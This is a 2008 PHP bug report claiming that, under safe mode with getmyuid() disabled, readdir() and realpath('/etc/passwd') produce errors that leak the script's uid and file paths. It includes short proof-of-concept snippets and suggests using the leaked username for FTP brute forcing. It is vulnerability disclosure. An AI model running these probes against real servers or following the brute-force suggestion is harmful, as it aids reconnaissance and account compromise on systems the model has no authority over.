From: cmos_clr at hotmail dot com Operating system: linux PHP version: 5.2CVS-2008-12-11 (snap) PHP Bug Type: Directory function related Bug description: fonction in safe mode bypass
Description: ------------ ::_::_::_::_::_::_::_::_::_::_::::_::_::_::_::_::_::_::_::_::_::::_::_::_::_::_::_::_::_::_::_::_:: :: ::Found by : CmOs_CLR & hard_hakerz :: ::MAILS : [EMAIL PROTECTED] & [EMAIL PROTECTED] :: ::SITE : wwW.SEC4EVER.coM :: ::-----------ABOUT Software:---------------- :: ::VERSION : PHP 5.2.6 :: ::Vendor : http://www.php.net :: ::------------------------------------------ :: :: ::Responsible Functions : readdir() , realpath() :: ::WHERE IS THE PROBLEM ? :: ::IN SERVERS WITH SAFE MODE ON AND * getmyuid() * DISABLED WE CAN ::BYPASS THIS. :: ::FIRST THIS ERROR WILL RESULT : getmyuid() has been disabled for ::security reasons. :: ::FOR readdir() : :: :: :: <?php :: if ($handle = opendir('.')) { :: while (false !== ($file = readdir($handle))) { :: if ($file != "." && $file != "..") { :: echo "$file\n"; :: } :: } :: closedir($handle); :: } :: ?> :: ::for realpath() : :: :: :: <?php :: echo realpath('/etc/passwd'); :: ?> :: ::THE RESULTAT IS : :: The script whose *uid is 100* is not allowed to access /etc/passwd ::owned by uid 0 in :: /home/*user*/domains/site.com/public_html/function.php on line xx :: ::NOTE : a lot of others function can result this error "getmyuid() ::bypass " un attacker can take a lot of information from this ::error. like is the safe mode activat from http.conf or php.ini? the ::user of a site who? = user of ftp this can simplify a ftpbrute ::forcing only the case of pass because the user is known ......etc ::this error is getmyuid() bypass in disabled fuction . :: :: ::thanks+good luck :: :: :: -- Edit bug report at http://bugs.php.net/?id=46831&edit=1 -- Try a CVS snapshot (PHP 5.2): http://bugs.php.net/fix.php?id=46831&r=trysnapshot52 Try a CVS snapshot (PHP 5.3): http://bugs.php.net/fix.php?id=46831&r=trysnapshot53 Try a CVS snapshot (PHP 6.0): http://bugs.php.net/fix.php?id=46831&r=trysnapshot60 Fixed in CVS: http://bugs.php.net/fix.php?id=46831&r=fixedcvs Fixed in CVS and need be documented: http://bugs.php.net/fix.php?id=46831&r=needdocs Fixed in release: http://bugs.php.net/fix.php?id=46831&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=46831&r=needtrace Need Reproduce Script: http://bugs.php.net/fix.php?id=46831&r=needscript Try newer version: http://bugs.php.net/fix.php?id=46831&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=46831&r=support Expected behavior: http://bugs.php.net/fix.php?id=46831&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=46831&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=46831&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=46831&r=globals PHP 4 support discontinued: http://bugs.php.net/fix.php?id=46831&r=php4 Daylight Savings: http://bugs.php.net/fix.php?id=46831&r=dst IIS Stability: http://bugs.php.net/fix.php?id=46831&r=isapi Install GNU Sed: http://bugs.php.net/fix.php?id=46831&r=gnused Floating point limitations: http://bugs.php.net/fix.php?id=46831&r=float No Zend Extensions: http://bugs.php.net/fix.php?id=46831&r=nozend MySQL Configuration Error: http://bugs.php.net/fix.php?id=46831&r=mysqlcfg